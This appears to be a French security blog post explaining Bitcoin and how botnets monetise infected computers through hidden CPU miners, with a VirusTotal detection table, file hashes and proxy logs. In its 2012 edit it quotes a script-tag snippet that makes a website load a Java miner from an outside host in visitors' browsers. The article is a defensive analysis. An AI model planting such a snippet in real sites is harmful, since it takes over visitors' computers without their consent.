BitCoin : Monétisation de Botnet

Dans le billet précédent CyberGate @ Numericable, je parlais de « Pour monétiser, l’infection a aussi installé un Trojan.Bitcoin que l’on retrouve souvent avec ces RAT. »

Mais qu’est ce que BitCoin ?

Une des meilleurs définition : http://hack-it.org/index.php?title=Bitcoin :

Le minage permet de générer des bitcoins contre de la puissance de calcul (CPU, GPU, ATU, ...).
 La puissance à fournir pour avoir un bitcoin grandit au fur et a mesure qu'ils sont générés, jusqu'a devenir impossible lorsqu'il y aura 21 Millions de BTC en circulation.

Pour une définition plus longue, se reporter à la page : http://bit-coin.fr/explication-concept-bitcoin/

Concrètement, Bitcoin est une monnaie virtuelle sur internet que l’on génère à partir de la CPU. Plus on génère de bitcoin plus la CPU requise pour en générer de nouveaux est grande.
Les Bitcoins peuvent servir à acheter des produits ou être échangés via des bureaux d’échanges contre de la vrai monnaie – dixit Wikipedia :

En date du 7 février 2011, vous pouviez acheter des Bitcoins à 1 Bitcoin = 0.88 $US soit 0.61 €. Par contre, il ne faut pas seulement regarder le taux de conversion, mais aussi tous les biens qu'il est possible d'obtenir

9,10

En date du 9 août 2011, la valeur du Bitcoin est de 5,36 €. En date du 11 août 2011, la valeur est de 7,05€.

D’autre part, Bitcoin permet de faire transiter de l’argent plus ou moins de manière anonyme, ce qui peux permettre de transférer des sommes entre Cybercriminal ou blanchir de l’argent.

Comme vous le savez, les botnets servent à gagner de l’argent, soit via des campagnes de SPAM ou en louant le Botnet pour des attaques DDoS. Soit en installant des adwares pour ouvrir des popups de publicités ou en faisant installer des logiciels tiers et en touchant de l’argent via les PPI (exemple avec Offerbox).

Depuis Juin 2011, un nouveau système consiste à utiliser les ordinateurs du botnet et de les faire miner pour générer des bitcoins.

L’opération se fait en faisant tout simplement installer un programme qui va tourner en fond et utiliser la CPU de l’ordinateur infecté pour générer ces bitcoins.
La majorité de ces programmes sont assez bourrains et tournent à 100 de CPU ce qui est pas très discret, mais on peux imaginer par la suite des modules plus intelligent qui se calquent selon la puissance du CPU pour ne pas ralentir le PC.

Ci-dessus, on peux voir un processus SystemMiner en .Net qui a été installé par un botnet et qui lance à son tour des processus bitcoin-miner.exe
Et plus bas un miner.exe qui est à fond la caisse au niveau CPU, ce dernier génère des bitcoins.

Trojan BitCoin : Monétisation de Botnet

Si l’on suspend miner.exe, ce sont les autres processus bitcoin-miner.exe qui prenne le relai pour utiliser la CPU et générer des bitcoins.
Trojan BitCoin : Monétisation de Botnet

Comme le montre ces captures et comme expliqué plus haut, ces miners ne sont pas très discrets puisqu’ils plombent la CPU et ralentissent l’ordinateur.
Exemple de détection d’un miner BitCoin :

File name: smona131594996965193399859
Submission date: 2011-09-13 21:45:01 (UTC)
Current status: finished
Result: 22 /43 (51.2%)	VT Community

Compact
Print results  Antivirus	Version	Last Update	Result
AhnLab-V3	2011.09.13.00	2011.09.13	Trojan/Win32.BitMiner
AntiVir	7.11.14.189	2011.09.13	SPR/Tool.BitCoinMiner.a.6
Antiy-AVL	2.0.3.7	2011.09.13	RiskTool/Win32.BitCoinMiner.gen
Avast	4.8.1351.0	2011.09.13	-
Avast5	5.0.677.0	2011.09.13	-
AVG	10.0.0.1190	2011.09.13	BitCoinMiner.A
BitDefender	7.2	2011.09.13	Application.BitCoinMiner.B
ByteHero	None	2011.09.13	-
CAT-QuickHeal	11.00	2011.09.13	-
ClamAV	0.97.0.0	2011.09.13	-
Commtouch	5.3.2.6	2011.09.13	-
Comodo	10102	2011.09.13	ApplicUnsaf.Win32.RiskTool.BitCoinMiner.A
DrWeb	5.0.2.03300	2011.09.13	Tool.BtcMine.2
Emsisoft	5.1.0.11	2011.09.13	Win32.SuspectCrc!IK
eSafe	7.0.17.0	2011.09.13	Win32.SPRTool.BitCoi
eTrust-Vet	36.1.8558	2011.09.13	-
F-Prot	4.6.2.117	2011.09.13	-
F-Secure	9.0.16440.0	2011.09.13	Application.BitCoinMiner.B
Fortinet	4.3.370.0	2011.09.11	HackerTool/BitCoinMiner
GData	22	2011.09.13	Application.BitCoinMiner.B
Ikarus	T3.1.1.107.0	2011.09.13	Win32.SuspectCrc
Jiangmin	13.0.900	2011.09.13	-
K7AntiVirus	9.112.5128	2011.09.13	Riskware
Kaspersky	9.0.0.837	2011.09.13	not-a-virus:RiskTool.Win32.BitCoinMiner.a
McAfee	5.400.0.1158	2011.09.13	Generic PUP.z!ga
McAfee-GW-Edition	2010.1D	2011.09.13	Generic PUP.z!ga
Microsoft	1.7604	2011.09.13	Program:Win32/CoinMiner
NOD32	6461	2011.09.13	a variant of Win32/BitCoinMiner
Norman	6.07.11	2011.09.13	-
nProtect	2011-09-13.01	2011.09.13	-
Panda	10.0.3.5	2011.09.13	-
PCTools	8.0.0.5	2011.09.13	-
Prevx	3.0	2011.09.13	-
Rising	23.74.03.03	2011.09.09	-
Sophos	4.69.0	2011.09.13	Bitcoin Miner
SUPERAntiSpyware	4.40.0.1006	2011.09.13	-
Symantec	20111.2.0.82	2011.09.13	-
TheHacker	6.7.0.1.293	2011.09.10	-
TrendMicro	9.500.0.1008	2011.09.13	-
TrendMicro-HouseCall	9.500.0.1008	2011.09.13	-
VBA32	3.12.16.4	2011.09.13	-
VIPRE	10466	2011.09.13	RiskTool.Win32.BitCoinMiner
ViRobot	2011.9.10.4666	2011.09.13	not-a-virus.RiskTool.Win32.BitCoinMiner.740352
Additional information
Show all
MD5   : 404fba79dc22aef44914498bfe3ba04f
SHA1  : e73acf50164d78c5c0102785a90c0618e2e53362
SHA256: bd51420383e3a71d6390c383b1d79ceefe4cb415d54d3a811e07b2371f025730

 

Si l’installation de BitCoin par des RAT/Cybergate est courante. On assiste aussi à une généralisation, certainement car cela fonctionne bien et que les contre pouvoir sont faibles (le temps de se mettre en place etc) et le fait que le système est décentralisé, ça ne doit pas aider.

Bref ce n’est certainement que le début.

Supprimer les trojan bitcoin

Vous trouverez des fichiers qui expliquent comment désinfecter votre ordinateur et supprimer les Trojan Bitcoin : http://www.supprimer-virus.com/?s=miner
Notamment parmis les plus répandus, on trouve : Claymore Bitcoin

EDIT Avril 2012 – BitCoin a travers  Java

Ce n’est pas la première fois que je tombe sur ce cas, je tiens tout de même à le signaler.

Vu sur un site pourri… Firefox qui tente de lancer un jar. Par habitude, on pense à un exploit qui se lance.


Mais aucun dropper à l’horizon… Java qui bourrine au niveau de la CPU.
Du côté des connexions, on peux voir :

TCP_MISS/200 843 GET http://www.bitcoinplus.com/api/work/getwork?a=32 – DIRECT/184.106.146.244 application/json
TCP_MISS/200 843 GET http://www.bitcoinplus.com/api/work/getwork?a=32 – DIRECT/184.106.146.244 application/json

Au final, donc un client bitcoin en Java.

Le site en question qui lance le client ne contient ‘un appel à un javascript qui se charge ensuite de lancer le JAR :

<script src= »http://www.bitcoinplus.com/js/miner.js » type= »text/javascript »></script><script type= »text/javascript »>BitcoinPlusMiner(1202421)</script>

L’adresse du Jar : http://www.bitcoinplus.com/jar/bitcoinplus-miner.jar

Ce n’est pas le site officle de bitcoin (http://bitcoin.org)
Mais bitcoinplus.com n’est bloqué par aucun antivirus : https://www.virustotal.com/url/d2efa6989690975e7f17a73d5f909e7ae98b194992696947e9ca47eab820e3e6/analysis/1334919287/
Le Javascript est à 0 sur VirusTotal : https://www.virustotal.com/file/7278e2b94d7dd8aaf1d561a333c336a583d2a431fcebe407be63e3947c9bc3bf/analysis/1334919289/
Seul Dr.Web détecte le JAR : https://www.virustotal.com/file/a10f79eaddc7d8f3ce0871ea4b9e022a5a179c7a00f502e8fcf25b539ae7f5f3/analysis/1334919357/

Avast! ne bloque pas le chargement du jar :

Le code n’est pas forcément malicieux et bitcoin.com ne distribue pas de malware puisqu’au final c’est un client bitcoin en java, ici ce qui pose problème, c’est plutôt l’utilisation qui en est faite.
Cela reste une utilisation du PC à l’insu de son propriétaire pour générer de l’argent (surtout que dans mon cas, les personnes doivent aussi être dans cybercriminalité « classique ») et en plus cela cause des ralentissements voire cela peux générer des plantages (et si le PC a un problème de refroidissement, cela peux causer des problèmes matériels).

Sur ce forum apparemment le webmaster a choisi cette méthode :
http://forum.gmod.biz/showthread.php?1540-Bitcoin-Mining
http://forum.gmod.biz/showthread.php?1576-Forum-java-application

Assez génant !

EDIT – Juillet 2015 : Trojan Miner poussé par des PUPs/Adwares

Les PUPs/Adwares qui poussent des Troja Miner, voir la page : Quand les PUPs/Adwares abusent : Trojan Miner

Comment lire d'autres tutoriels de malekal.com ?

Si le site vous a aidé, svp, débloquez les bloqueurs de publicités, n'hésitez pas non plus à partager l'article ou le site sur les réseaux sociaux.

Pour pouvoir lire plus d'articles et tutoriels, utilisez le menu en haut du site. Plein d'articles et tutos utiles vous attendent !

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com
(Visited 160 times, 1 visits today)

2 thoughts on “BitCoin : Monétisation de Botnet

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *